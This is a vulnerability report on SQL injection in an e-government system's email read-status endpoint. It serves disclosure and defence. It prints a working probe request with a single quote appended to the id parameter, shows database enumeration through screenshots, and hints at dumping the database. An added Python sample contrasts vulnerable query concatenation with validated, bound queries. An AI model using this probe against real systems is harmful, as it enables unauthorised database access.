### Summary:

SQL injection in an e-government system, part 3

### Details:

Finding the injection point: a single quote was appended.

[![Capture.JPG](https://images.seebug.org/upload/201410/02115109072f2a7e26f47d469fe16283b218b678.jpg)](https://images.seebug.org/upload/201410/02115109072f2a7e26f47d469fe16283b218b678.jpg)

Verifying the vulnerability (against the latest version, downloaded and run locally):

```
GET /email/sent/readstatus/type/trash?id=1' HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: bdshare_firstime=1377949252099; sYQDUGqqzHsearch_history=%u83AB%u540D%u5176%u5999%7C3%2C%u83AB%u540D%u5176%u5999%7C1%2C%u83AB%u540D%u5176%u5999%7C2%2C%u83AB%u540D%u5176%u5999%7C52%2C%u5218%u6C34%u7965%7C1%2C%u5218%u6C34%u7965%7C3; VAAe_2132_ulastactivity=9ef8jg2bCnEtgD0qgMtFq8RoWHjgYuAcLA3yESzExcouOcnNu0Jm; VAAe_2132_lastcheckfeed=1%7C1390636626; WVk_lastvisit=337%091412074847%09%2Faudit%2Fphpwind_v9.0_utf8%2F; tour_current_step=0; tour_end=yes; file1_public_treeNode=2; file1_private_treeNode=1; viewType=grid; timelineView=summary; P_username=admin; GOASESSID=3b28fv0h1941m1r5gg55c4mbh5; language=zh_CN
```

[![Capture.JPG](https://images.seebug.org/upload/201410/021151425fc8ffd466c668825a654c28dcce27a5.jpg)](https://images.seebug.org/upload/201410/021151425fc8ffd466c668825a654c28dcce27a5.jpg)

Listing all databases:

[![Capture.JPG](https://images.seebug.org/upload/201410/0211522097630c630654296a054b388a1d610e51.jpg)](https://images.seebug.org/upload/201410/0211522097630c630654296a054b388a1d610e51.jpg)

From there, how to dump the database goes without saying....

### Proof of vulnerability:

Finding the injection point: a single quote was appended.

[![Capture.JPG](https://images.seebug.org/upload/201410/02115109072f2a7e26f47d469fe16283b218b678.jpg)](https://images.seebug.org/upload/201410/02115109072f2a7e26f47d469fe16283b218b678.jpg)

[![Capture.JPG](https://images.seebug.org/upload/201410/021151425fc8ffd466c668825a654c28dcce27a5.jpg)](https://images.seebug.org/upload/201410/021151425fc8ffd466c668825a654c28dcce27a5.jpg)

Listing all databases:

[![Capture.JPG](https://images.seebug.org/upload/201410/0211522097630c630654296a054b388a1d610e51.jpg)](https://images.seebug.org/upload/201410/0211522097630c630654296a054b388a1d610e51.jpg)
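
An added example (not code from the report or from the affected product): why the `id=1'` request above produces a database error when a handler concatenates the parameter into SQL, shown beside a handler that validates the value and binds it. The `email` table, its columns, both handler functions and the use of SQLite as the database are assumptions for illustration.

```python
import sqlite3

def make_db():
    """Constructed sample data; table and column names are assumptions."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE email (id INTEGER PRIMARY KEY, folder TEXT, is_read INTEGER)")
    db.executemany("INSERT INTO email VALUES (?, ?, ?)",
                   [(1, "trash", 0), (2, "trash", 1), (3, "sent", 0)])
    return db

def read_status_concat(db, raw_id):
    """'Before' pattern: the request value becomes part of the SQL text."""
    sql = "SELECT id, is_read FROM email WHERE folder = 'trash' AND id = " + raw_id
    return db.execute(sql).fetchall()

def read_status_bound(db, raw_id):
    """Hardened pattern: strict integer check, then a bound parameter."""
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 18):
        raise ValueError("id must be a decimal integer")
    sql = "SELECT id, is_read FROM email WHERE folder = 'trash' AND id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()

def probe(handler, raw_id):
    """Run one request value through a handler and classify the outcome."""
    db = make_db()
    try:
        return ("ok", handler(db, raw_id))
    except sqlite3.Error as exc:
        # The quote reached the SQL parser and was treated as syntax.
        return ("sql_error", str(exc))
    except ValueError as exc:
        # The value was refused before any SQL was built.
        return ("rejected", str(exc))
    finally:
        db.close()

if __name__ == "__main__":
    for handler in (read_status_concat, read_status_bound):
        for value in ("1", "1'"):
            print(handler.__name__, repr(value), probe(handler, value))
```

A database error returned for a value like `1'` is the signal worth alerting on in application logs: it means request data is being parsed as SQL rather than treated as a value.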